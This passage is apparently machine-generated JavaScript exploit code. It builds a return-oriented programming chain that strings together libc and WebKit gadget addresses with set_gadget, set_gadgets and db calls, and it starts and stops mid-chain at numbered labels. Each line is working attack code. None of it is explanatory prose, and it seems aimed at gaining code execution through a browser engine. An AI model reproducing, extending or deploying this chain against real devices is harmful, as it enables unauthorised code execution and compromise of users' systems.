//L282:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L283:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L284:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77416, //L286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77544, //L288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77560, //L289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77528, //L287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L287:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L289:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+77720, //L293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+77688, //L291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77704, //L292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L290:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L291:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L293:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77776, //L295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77904, //L297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77920, //L298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77888, //L296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L296:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L297:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L298:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+78000, //L299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+78016, //L300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L299:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L300:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+78104, //L301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+78120, //L303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L301:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L303:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L304:
db([4294967283, 4294967295]); // -0xd
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L306:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+78280, //L309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78264, //L307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L307:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L309:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+78424, //L312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78392, //L310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+78408, //L311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L311:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L312:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+78496, //L314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L314:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+78552, //L315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L315:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+78632, //L317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L317:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L319:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+78752, //L322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78736, //L320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L320:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L322:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+78928, //L325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+78944, //L326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78896, //L323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+78912, //L324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L323:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L324:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L325:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L326:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+79056, //L327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79088, //L329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79072, //L328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+79176, //L331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L331:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+79232, //L332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L332:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+79376, //L335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79392, //L336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+79360, //L334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L334:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L335:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L336:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+79552, //L340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+79520, //L338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+79536, //L339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L337:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L338:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L339:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+79608, //L342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L342:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+79736, //L344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79752, //L345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79720, //L343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L343:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L344:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L345:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+79912, //L349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+79880, //L347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79896, //L348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L346:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L347:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L348:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L349:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+79968, //L351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80096, //L353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80112, //L354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80080, //L352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L352:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L353:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L354:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80272, //L358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+80240, //L356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80256, //L357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L355:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+80328, //L360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L360:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80456, //L362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80472, //L363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80440, //L361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L361:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L362:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L363:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80552, //L364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80568, //L365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L364:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L365:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80728, //L369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+80696, //L367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80712, //L368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L366:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L367:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L368:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+80784, //L371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L371:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80912, //L373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80928, //L374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80896, //L372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L372:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L373:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L374:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+81024, //L376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+81008, //L375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L375:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81104, //L377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L377:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L379:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+81224, //L382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81208, //L380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L382:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+81368, //L385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81336, //L383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+81352, //L384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L384:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L385:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+81440, //L387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L387:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81496, //L388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L388:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L390:
db([7, 0]); // 0x7
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81624, //L391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L391:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L393:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+81744, //L396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81728, //L394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L394:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L396:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+81920, //L399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+81936, //L400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81888, //L397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+81904, //L398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L397:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L398:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+82048, //L401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+82080, //L403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+82064, //L402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L401:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L403:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+82192, //L404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+82208, //L405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L405:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+82296, //L407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L407:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+82352, //L408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+82424, //L411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L411:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+82480, //L412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+82568, //L414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L416:
db([4294967283, 4294967295]); // -0xd
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+82688, //L419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+82672, //L417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L417:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L419:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+82848, //L423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+82816, //L421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+82832, //L422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L420:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L423:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+82904, //L425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83032, //L427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83048, //L428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83016, //L426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L426:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L427:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L428:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83208, //L432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+83176, //L430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83192, //L431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L429:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L430:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L431:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+83264, //L434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83392, //L436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83408, //L437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83376, //L435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L435:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L436:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L437:
